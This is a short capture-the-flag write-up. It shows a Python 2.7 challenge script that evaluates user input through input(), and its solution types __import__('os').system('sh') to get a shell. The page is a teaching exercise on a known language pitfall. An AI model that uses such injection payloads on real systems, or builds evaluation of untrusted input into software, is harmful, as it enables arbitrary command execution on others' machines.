Skip to content

Latest commit

 

History

History

how-r-u

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

how r u

challenge

#!/usr/bin/env python2.7
try:
        input("hello! how are you feeling today? > ")
except:
        print("hello! how are you feeling today? > ")

solution

this uses input and not raw_input. this is super dangerous in python 2.7 bc we can just put in python code and it will execute it 💀

we can just type in __import__('os').system('sh') to win lol